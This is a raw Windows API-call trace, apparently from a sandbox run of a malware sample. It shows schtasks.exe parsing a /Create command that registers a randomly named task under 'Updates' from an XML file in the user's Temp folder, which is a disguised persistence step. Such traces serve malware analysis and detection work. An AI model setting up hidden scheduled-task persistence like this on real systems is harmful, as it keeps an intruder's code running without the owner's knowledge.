[0223.162] RtlRestoreLastWin32Error () returned 0x490
[0223.162] RtlRestoreLastWin32Error () returned 0x0
[0223.162] lstrlenW (lpString="/TN") returned 3
[0223.162] StrChrIW (lpStart="/TN", wMatch=0x3a) returned 0x0
[0223.162] RtlRestoreLastWin32Error () returned 0x490
[0223.162] RtlRestoreLastWin32Error () returned 0x0
[0223.162] lstrlenW (lpString="/TN") returned 3
[0223.162] GetProcessHeap () returned 0x450000
[0223.162] RtlAllocateHeap (HeapHandle=0x450000, Flags=0xc, Size=0x8) returned 0x456c70
[0223.162] GetProcessHeap () returned 0x450000
[0223.162] RtlAllocateHeap (HeapHandle=0x450000, Flags=0xc, Size=0x14) returned 0x459648
[0223.162] RtlRestoreLastWin32Error () returned 0x0
[0223.162] RtlRestoreLastWin32Error () returned 0x0
[0223.162] lstrlenW (lpString="Updates\\ohnfNTVBamkg") returned 20
[0223.162] lstrlenW (lpString="-/") returned 2
[0223.162] StrChrIW (lpStart="-/", wMatch=0x780055) returned 0x0
[0223.162] RtlRestoreLastWin32Error () returned 0x490
[0223.162] RtlRestoreLastWin32Error () returned 0x490
[0223.162] RtlRestoreLastWin32Error () returned 0x0
[0223.162] lstrlenW (lpString="Updates\\ohnfNTVBamkg") returned 20
[0223.162] StrChrIW (lpStart="Updates\\ohnfNTVBamkg", wMatch=0x3a) returned 0x0
[0223.162] RtlRestoreLastWin32Error () returned 0x490
[0223.162] RtlRestoreLastWin32Error () returned 0x0
[0223.162] lstrlenW (lpString="Updates\\ohnfNTVBamkg") returned 20
[0223.162] GetProcessHeap () returned 0x450000
[0223.162] RtlAllocateHeap (HeapHandle=0x450000, Flags=0xc, Size=0x2a) returned 0x458f98
[0223.162] GetProcessHeap () returned 0x450000
[0223.162] RtlAllocateHeap (HeapHandle=0x450000, Flags=0xc, Size=0x14) returned 0x459668
[0223.162] RtlRestoreLastWin32Error () returned 0x0
[0223.162] RtlRestoreLastWin32Error () returned 0x0
[0223.163] lstrlenW (lpString="/XML") returned 4
[0223.163] lstrlenW (lpString="-/") returned 2
[0223.163] StrChrIW (lpStart="-/", wMatch=0x78002f) returned="/"
[0223.163] lstrlenW (lpString="?") returned 1
[0223.163] lstrlenW (lpString="?") returned 1
[0223.163] _memicmp (_Buf1=0x4574c8, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.163] lstrlenW (lpString="XML") returned 3
[0223.163] _memicmp (_Buf1=0x4574e0, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.163] _vsnwprintf (in: _Buffer=0x4595e8, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|?|") returned 3
[0223.163] _vsnwprintf (in: _Buffer=0x4595c8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|XML|") returned 5
[0223.163] lstrlenW (lpString="|?|") returned 3
[0223.163] lstrlenW (lpString="|XML|") returned 5
[0223.163] RtlRestoreLastWin32Error () returned 0x490
[0223.163] lstrlenW (lpString="create") returned 6
[0223.163] lstrlenW (lpString="create") returned 6
[0223.163] _memicmp (_Buf1=0x4574c8, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.163] lstrlenW (lpString="XML") returned 3
[0223.163] _memicmp (_Buf1=0x4574e0, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.163] _vsnwprintf (in: _Buffer=0x4595e8, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|create|") returned 8
[0223.163] _vsnwprintf (in: _Buffer=0x4595c8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|XML|") returned 5
[0223.163] lstrlenW (lpString="|create|") returned 8
[0223.163] lstrlenW (lpString="|XML|") returned 5
[0223.163] StrStrIW (lpFirst="|create|", lpSrch="|XML|") returned 0x0
[0223.163] RtlRestoreLastWin32Error () returned 0x490
[0223.163] lstrlenW (lpString="delete") returned 6
[0223.163] lstrlenW (lpString="delete") returned 6
[0223.163] _memicmp (_Buf1=0x4574c8, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.163] lstrlenW (lpString="XML") returned 3
[0223.163] _memicmp (_Buf1=0x4574e0, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.164] _vsnwprintf (in: _Buffer=0x4595e8, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|delete|") returned 8
[0223.164] _vsnwprintf (in: _Buffer=0x4595c8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|XML|") returned 5
[0223.164] lstrlenW (lpString="|delete|") returned 8
[0223.164] lstrlenW (lpString="|XML|") returned 5
[0223.164] StrStrIW (lpFirst="|delete|", lpSrch="|XML|") returned 0x0
[0223.164] RtlRestoreLastWin32Error () returned 0x490
[0223.164] lstrlenW (lpString="query") returned 5
[0223.164] lstrlenW (lpString="query") returned 5
[0223.164] _memicmp (_Buf1=0x4574c8, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.164] lstrlenW (lpString="XML") returned 3
[0223.164] _memicmp (_Buf1=0x4574e0, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.164] _vsnwprintf (in: _Buffer=0x4595e8, _BufferCount=0x8, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|query|") returned 7
[0223.164] _vsnwprintf (in: _Buffer=0x4595c8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|XML|") returned 5
[0223.164] lstrlenW (lpString="|query|") returned 7
[0223.164] lstrlenW (lpString="|XML|") returned 5
[0223.164] StrStrIW (lpFirst="|query|", lpSrch="|XML|") returned 0x0
[0223.164] RtlRestoreLastWin32Error () returned 0x490
[0223.165] lstrlenW (lpString="change") returned 6
[0223.165] lstrlenW (lpString="change") returned 6
[0223.165] _memicmp (_Buf1=0x4574c8, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.165] lstrlenW (lpString="XML") returned 3
[0223.165] _memicmp (_Buf1=0x4574e0, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.165] _vsnwprintf (in: _Buffer=0x4595e8, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|change|") returned 8
[0223.165] _vsnwprintf (in: _Buffer=0x4595c8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|XML|") returned 5
[0223.165] lstrlenW (lpString="|change|") returned 8
[0223.165] lstrlenW (lpString="|XML|") returned 5
[0223.165] StrStrIW (lpFirst="|change|", lpSrch="|XML|") returned 0x0
[0223.165] RtlRestoreLastWin32Error () returned 0x490
[0223.165] lstrlenW (lpString="run") returned 3
[0223.165] lstrlenW (lpString="run") returned 3
[0223.165] _memicmp (_Buf1=0x4574c8, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.165] lstrlenW (lpString="XML") returned 3
[0223.165] _memicmp (_Buf1=0x4574e0, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.165] _vsnwprintf (in: _Buffer=0x4595e8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|run|") returned 5
[0223.165] _vsnwprintf (in: _Buffer=0x4595c8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|XML|") returned 5
[0223.165] lstrlenW (lpString="|run|") returned 5
[0223.165] lstrlenW (lpString="|XML|") returned 5
[0223.165] StrStrIW (lpFirst="|run|", lpSrch="|XML|") returned 0x0
[0223.165] RtlRestoreLastWin32Error () returned 0x490
[0223.165] lstrlenW (lpString="end") returned 3
[0223.165] lstrlenW (lpString="end") returned 3
[0223.165] _memicmp (_Buf1=0x4574c8, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.166] lstrlenW (lpString="XML") returned 3
[0223.166] _memicmp (_Buf1=0x4574e0, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.166] _vsnwprintf (in: _Buffer=0x4595e8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|end|") returned 5
[0223.166] _vsnwprintf (in: _Buffer=0x4595c8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|XML|") returned 5
[0223.166] lstrlenW (lpString="|end|") returned 5
[0223.166] lstrlenW (lpString="|XML|") returned 5
[0223.166] StrStrIW (lpFirst="|end|", lpSrch="|XML|") returned 0x0
[0223.166] RtlRestoreLastWin32Error () returned 0x490
[0223.166] lstrlenW (lpString="showsid") returned 7
[0223.166] lstrlenW (lpString="showsid") returned 7
[0223.166] _memicmp (_Buf1=0x4574c8, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.166] lstrlenW (lpString="XML") returned 3
[0223.166] _memicmp (_Buf1=0x4574e0, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.166] _vsnwprintf (in: _Buffer=0x4595e8, _BufferCount=0xa, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|showsid|") returned 9
[0223.166] _vsnwprintf (in: _Buffer=0x4595c8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|XML|") returned 5
[0223.166] lstrlenW (lpString="|showsid|") returned 9
[0223.166] lstrlenW (lpString="|XML|") returned 5
[0223.166] StrStrIW (lpFirst="|showsid|", lpSrch="|XML|") returned 0x0
[0223.166] RtlRestoreLastWin32Error () returned 0x490
[0223.166] RtlRestoreLastWin32Error () returned 0x490
[0223.166] RtlRestoreLastWin32Error () returned 0x0
[0223.166] lstrlenW (lpString="/XML") returned 4
[0223.166] StrChrIW (lpStart="/XML", wMatch=0x3a) returned 0x0
[0223.166] RtlRestoreLastWin32Error () returned 0x490
[0223.166] RtlRestoreLastWin32Error () returned 0x0
[0223.166] lstrlenW (lpString="/XML") returned 4
[0223.166] GetProcessHeap () returned 0x450000
[0223.166] RtlAllocateHeap (HeapHandle=0x450000, Flags=0xc, Size=0xa) returned 0x457408
[0223.166] GetProcessHeap () returned 0x450000
[0223.166] RtlAllocateHeap (HeapHandle=0x450000, Flags=0xc, Size=0x14) returned 0x459488
[0223.166] RtlRestoreLastWin32Error () returned 0x0
[0223.166] RtlRestoreLastWin32Error () returned 0x0
[0223.167] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmp1326.tmp") returned 52
[0223.167] lstrlenW (lpString="-/") returned 2
[0223.167] StrChrIW (lpStart="-/", wMatch=0x780043) returned 0x0
[0223.167] RtlRestoreLastWin32Error () returned 0x490
[0223.167] RtlRestoreLastWin32Error () returned 0x490
[0223.167] RtlRestoreLastWin32Error () returned 0x0
[0223.167] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmp1326.tmp") returned 52
[0223.167] StrChrIW (lpStart="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmp1326.tmp", wMatch=0x3a) returned=":\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmp1326.tmp"
[0223.167] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmp1326.tmp") returned 52
[0223.167] GetProcessHeap () returned 0x450000
[0223.167] RtlAllocateHeap (HeapHandle=0x450000, Flags=0xc, Size=0x10) returned 0x457450
[0223.167] _memicmp (_Buf1=0x457450, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.167] GetProcessHeap () returned 0x450000
[0223.167] RtlAllocateHeap (HeapHandle=0x450000, Flags=0xc, Size=0xc) returned 0x457480
[0223.167] GetProcessHeap () returned 0x450000
[0223.167] RtlAllocateHeap (HeapHandle=0x450000, Flags=0xc, Size=0x10) returned 0x45a9d0
[0223.167] _memicmp (_Buf1=0x45a9d0, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.167] GetProcessHeap () returned 0x450000
[0223.167] RtlAllocateHeap (HeapHandle=0x450000, Flags=0xc, Size=0x6e) returned 0x4569e0
[0223.167] RtlRestoreLastWin32Error () returned 0x7a
[0223.167] RtlRestoreLastWin32Error () returned 0x0
[0223.167] RtlRestoreLastWin32Error () returned 0x0
[0223.167] lstrlenW (lpString="C") returned 1
[0223.167] RtlRestoreLastWin32Error () returned 0x490
[0223.167] RtlRestoreLastWin32Error () returned 0x0
[0223.167] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmp1326.tmp") returned 52
[0223.167] GetProcessHeap () returned 0x450000
[0223.167] RtlAllocateHeap (HeapHandle=0x450000, Flags=0xc, Size=0x6a) returned 0x456a58
[0223.167] GetProcessHeap () returned 0x450000
[0223.167] RtlAllocateHeap (HeapHandle=0x450000, Flags=0xc, Size=0x14) returned 0x459528
[0223.167] RtlRestoreLastWin32Error () returned 0x0
[0223.167] GetProcessHeap () returned 0x450000
[0223.167] GetProcessHeap () returned 0x450000
[0223.167] HeapValidate (hHeap=0x450000, dwFlags=0x0, lpMem=0x456c70) returned 1
[0223.167] GetProcessHeap () returned 0x450000
[0223.168] RtlSizeHeap (HeapHandle=0x450000, Flags=0x0, MemoryPointer=0x456c70) returned 0x8
[0223.168] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x456c70) returned 1
[0223.168] GetProcessHeap () returned 0x450000
[0223.168] GetProcessHeap () returned 0x450000
[0223.168] HeapValidate (hHeap=0x450000, dwFlags=0x0, lpMem=0x459648) returned 1
[0223.168] GetProcessHeap () returned 0x450000
[0223.168] RtlSizeHeap (HeapHandle=0x450000, Flags=0x0, MemoryPointer=0x459648) returned 0x14
[0223.168] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x459648) returned 1
[0223.168] GetProcessHeap () returned 0x450000
[0223.168] GetProcessHeap () returned 0x450000
[0223.168] HeapValidate (hHeap=0x450000, dwFlags=0x0, lpMem=0x458f98) returned 1
[0223.168] GetProcessHeap () returned 0x450000
[0223.168] RtlSizeHeap (HeapHandle=0x450000, Flags=0x0, MemoryPointer=0x458f98) returned 0x2a
[0223.168] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x458f98) returned 1
[0223.168] GetProcessHeap () returned 0x450000
[0223.168] GetProcessHeap () returned 0x450000
[0223.168] HeapValidate (hHeap=0x450000, dwFlags=0x0, lpMem=0x459668) returned 1
[0223.168] GetProcessHeap () returned 0x450000
[0223.168] RtlSizeHeap (HeapHandle=0x450000, Flags=0x0, MemoryPointer=0x459668) returned 0x14
[0223.169] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x459668) returned 1
[0223.169] GetProcessHeap () returned 0x450000
[0223.169] GetProcessHeap () returned 0x450000
[0223.169] HeapValidate (hHeap=0x450000, dwFlags=0x0, lpMem=0x457408) returned 1
[0223.169] GetProcessHeap () returned 0x450000
[0223.169] RtlSizeHeap (HeapHandle=0x450000, Flags=0x0, MemoryPointer=0x457408) returned 0xa
[0223.169] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x457408) returned 1
[0223.169] GetProcessHeap () returned 0x450000
[0223.169] GetProcessHeap () returned 0x450000
[0223.169] HeapValidate (hHeap=0x450000, dwFlags=0x0, lpMem=0x459488) returned 1
[0223.169] GetProcessHeap () returned 0x450000
[0223.169] RtlSizeHeap (HeapHandle=0x450000, Flags=0x0, MemoryPointer=0x459488) returned 0x14
[0223.169] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x459488) returned 1
[0223.169] GetProcessHeap () returned 0x450000
[0223.169] GetProcessHeap () returned 0x450000
[0223.169] HeapValidate (hHeap=0x450000, dwFlags=0x0, lpMem=0x456a58) returned 1
[0223.169] GetProcessHeap () returned 0x450000
[0223.169] RtlSizeHeap (HeapHandle=0x450000, Flags=0x0, MemoryPointer=0x456a58) returned 0x6a
[0223.169] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x456a58) returned 1
[0223.169] GetProcessHeap () returned 0x450000
[0223.169] GetProcessHeap () returned 0x450000
[0223.169] HeapValidate (hHeap=0x450000, dwFlags=0x0, lpMem=0x459528) returned 1
[0223.170] GetProcessHeap () returned 0x450000
[0223.170] RtlSizeHeap (HeapHandle=0x450000, Flags=0x0, MemoryPointer=0x459528) returned 0x14
[0223.170] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x459528) returned 1
[0223.170] GetProcessHeap () returned 0x450000
[0223.170] GetProcessHeap () returned 0x450000
[0223.170] HeapValidate (hHeap=0x450000, dwFlags=0x0, lpMem=0x457468) returned 1
[0223.170] GetProcessHeap () returned 0x450000
[0223.170] RtlSizeHeap (HeapHandle=0x450000, Flags=0x0, MemoryPointer=0x457468) returned 0x10
[0223.170] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x457468) returned 1
[0223.170] RtlRestoreLastWin32Error () returned 0x0
[0223.170] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18
[0223.170] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b
[0223.170] VerSetConditionMask (ConditionMask=0x1b, TypeMask=0x80000000, Condition=0x20) returned 0x1801b
[0223.170] RtlVerifyVersionInfo (VersionInfo=0xdce60, TypeMask=0x3, ConditionMask=0x1801b) returned 0x0
[0223.171] RtlRestoreLastWin32Error () returned 0x0
[0223.171] lstrlenW (lpString="create") returned 6
[0223.171] StrChrIW (lpStart="create", wMatch=0x7c) returned 0x0
[0223.171] RtlRestoreLastWin32Error () returned 0x490
[0223.171] RtlRestoreLastWin32Error () returned 0x0
[0223.171] lstrlenW (lpString="create") returned 6
[0223.171] GetProcessHeap () returned 0x450000
[0223.171] RtlAllocateHeap (HeapHandle=0x450000, Flags=0xc, Size=0x14) returned 0x459348
[0223.171] GetProcessHeap () returned 0x450000
[0223.171] RtlAllocateHeap (HeapHandle=0x450000, Flags=0xc, Size=0x10) returned 0x45ac10
[0223.171] _memicmp (_Buf1=0x45ac10, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.171] GetProcessHeap () returned 0x450000
[0223.171] RtlAllocateHeap (HeapHandle=0x450000, Flags=0xc, Size=0x16) returned 0x4596c8
[0223.171] RtlRestoreLastWin32Error () returned 0x0
[0223.171] _memicmp (_Buf1=0x457360, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.171] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x458ce0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\schtasks.exe" (normalized: "c:\\windows\\syswow64\\schtasks.exe")) returned 0x20
[0223.171] GetFileVersionInfoSizeExW (in: dwFlags=0x1, lpwstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", lpdwHandle=0xdcf6c | out: lpdwHandle=0xdcf6c) returned 0x76c
[0223.171] GetProcessHeap () returned 0x450000
[0223.171] RtlAllocateHeap (HeapHandle=0x450000, Flags=0xc, Size=0x776) returned 0x459db8
[0223.171] GetFileVersionInfoExW (in: dwFlags=0x3, lpwstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", dwHandle=0x0, dwLen=0x776, lpData=0x459db8 | out: lpData=0x459db8) returned 1
[0223.171] VerQueryValueW (in: pBlock=0x459db8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xdcf74, puLen=0xdcf78 | out: lplpBuffer=0xdcf74*=0x45a168, puLen=0xdcf78) returned 1
[0223.172] _memicmp (_Buf1=0x457360, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.172] _vsnwprintf (in: _Buffer=0x458ce0, _BufferCount=0x3f, _Format="\\StringFileInfo\\%04x%04x\\InternalName", _ArgList=0xdcf58 | out: _Buffer="\\StringFileInfo\\040904b0\\InternalName") returned 37
[0223.172] VerQueryValueW (in: pBlock=0x459db8, lpSubBlock="\\StringFileInfo\\040904b0\\InternalName", lplpBuffer=0xdcf84, puLen=0xdcf80 | out: lplpBuffer=0xdcf84*=0x459f98, puLen=0xdcf80) returned 1
[0223.172] lstrlenW (lpString="schtasks.exe") returned 12
[0223.172] lstrlenW (lpString="schtasks.exe") returned 12
[0223.172] lstrlenW (lpString=".EXE") returned 4
[0223.172] StrStrIW (lpFirst="schtasks.exe", lpSrch=".EXE") returned=".exe"
[0223.172] lstrlenW (lpString="schtasks.exe") returned 12
[0223.172] lstrlenW (lpString=".EXE") returned 4
[0223.172] lstrlenW (lpString="schtasks") returned 8
[0223.172] lstrlenW (lpString="/create") returned 7
[0223.172] _memicmp (_Buf1=0x457360, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.172] _vsnwprintf (in: _Buffer=0x458ce0, _BufferCount=0x19, _Format="%s %s", _ArgList=0xdcf58 | out: _Buffer="schtasks /create") returned 16
[0223.172] _memicmp (_Buf1=0x457390, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.172] GetProcessHeap () returned 0x450000
[0223.172] RtlAllocateHeap (HeapHandle=0x450000, Flags=0xc, Size=0x14) returned 0x459688
[0223.172] _memicmp (_Buf1=0x457330, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.172] LoadStringW (in: hInstance=0x0, uID=0x15ed, lpBuffer=0x45a798, cchBufferMax=256 | out: lpBuffer="Type \"%s /?\" for usage.") returned 0x17
[0223.172] lstrlenW (lpString="Type \"%s /?\" for usage.") returned 23
[0223.172] GetProcessHeap () returned 0x450000
[0223.172] RtlAllocateHeap (HeapHandle=0x450000, Flags=0xc, Size=0x30) returned 0x458f98
[0223.172] _vsnwprintf (in: _Buffer=0x458ef0, _BufferCount=0x4f, _Format="Type \"%s /?\" for usage.", _ArgList=0xdcf5c | out: _Buffer="Type \"SCHTASKS /CREATE /?\" for usage.") returned 37
[0223.172] GetProcessHeap () returned 0x450000
[0223.172] GetProcessHeap () returned 0x450000
[0223.172] HeapValidate (hHeap=0x450000, dwFlags=0x0, lpMem=0x459db8) returned 1
[0223.172] GetProcessHeap () returned 0x450000
[0223.172] RtlSizeHeap (HeapHandle=0x450000, Flags=0x0, MemoryPointer=0x459db8) returned 0x776
[0223.173] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x459db8) returned 1
[0223.173] RtlRestoreLastWin32Error () returned 0x0
[0223.173] GetThreadLocale () returned 0x409
[0223.173] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0223.173] lstrlenW (lpString="create") returned 6
[0223.173] GetThreadLocale () returned 0x409
[0223.173] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0223.173] lstrlenW (lpString="?") returned 1
[0223.173] GetThreadLocale () returned 0x409
[0223.173] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0223.173] lstrlenW (lpString="s") returned 1
[0223.173] GetThreadLocale () returned 0x409
[0223.173] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0223.173] lstrlenW (lpString="u") returned 1
[0223.173] GetThreadLocale () returned 0x409
[0223.173] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0223.173] lstrlenW (lpString="p") returned 1
[0223.173] GetThreadLocale () returned 0x409
[0223.173] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0223.173] lstrlenW (lpString="ru") returned 2
[0223.173] GetThreadLocale () returned 0x409
[0223.173] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0223.174] lstrlenW (lpString="rp") returned 2
[0223.174] GetThreadLocale () returned 0x409
[0223.174] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0223.174] lstrlenW (lpString="sc") returned 2
[0223.174] GetThreadLocale () returned 0x409
[0223.174] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0223.174] lstrlenW (lpString="mo") returned 2
[0223.174] GetThreadLocale () returned 0x409
[0223.174] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0223.174] lstrlenW (lpString="d") returned 1
[0223.174] GetThreadLocale () returned 0x409
[0223.174] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0223.174] lstrlenW (lpString="m") returned 1
[0223.174] GetThreadLocale () returned 0x409
[0223.174] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0223.174] lstrlenW (lpString="i") returned 1
[0223.174] GetThreadLocale () returned 0x409
[0223.174] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0223.174] lstrlenW (lpString="tn") returned 2
[0223.174] GetThreadLocale () returned 0x409
[0223.174] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0223.174] lstrlenW (lpString="tr") returned 2
[0223.174] GetThreadLocale () returned 0x409
[0223.174] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0223.174] lstrlenW (lpString="st") returned 2
[0223.174] GetThreadLocale () returned 0x409
[0223.174] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0223.174] lstrlenW (lpString="sd") returned 2
[0223.174] GetThreadLocale () returned 0x409
[0223.174] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0223.174] lstrlenW (lpString="ed") returned 2
[0223.174] GetThreadLocale () returned 0x409
[0223.174] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0223.174] lstrlenW (lpString="it") returned 2
[0223.175] GetThreadLocale () returned 0x409
[0223.175] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0223.175] lstrlenW (lpString="et") returned 2
[0223.175] GetThreadLocale () returned 0x409
[0223.175] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0223.175] lstrlenW (lpString="k") returned 1
[0223.175] GetThreadLocale () returned 0x409
[0223.175] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0223.175] lstrlenW (lpString="du") returned 2
[0223.175] GetThreadLocale () returned 0x409
[0223.175] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0223.175] lstrlenW (lpString="ri") returned 2
[0223.175] GetThreadLocale () returned 0x409
[0223.175] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0223.175] lstrlenW (lpString="z") returned 1
[0223.175] GetThreadLocale () returned 0x409
[0223.175] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0223.175] lstrlenW (lpString="f") returned 1
[0223.175] GetThreadLocale () returned 0x409
[0223.175] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0223.175] lstrlenW (lpString="v1") returned 2
[0223.175] GetThreadLocale () returned 0x409
[0223.175] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0223.175] lstrlenW (lpString="xml") returned 3
[0223.175] GetThreadLocale () returned 0x409
[0223.175] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0223.175] lstrlenW (lpString="ec") returned 2
[0223.175] GetThreadLocale () returned 0x409
[0223.175] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0223.175] lstrlenW (lpString="rl") returned 2
[0223.175] GetThreadLocale () returned 0x409
[0223.175] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0223.175] lstrlenW (lpString="delay") returned 5
[0223.175] GetThreadLocale () returned 0x409
[0223.175] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0223.176] lstrlenW (lpString="np") returned 2
[0223.176] GetThreadLocale () returned 0x409
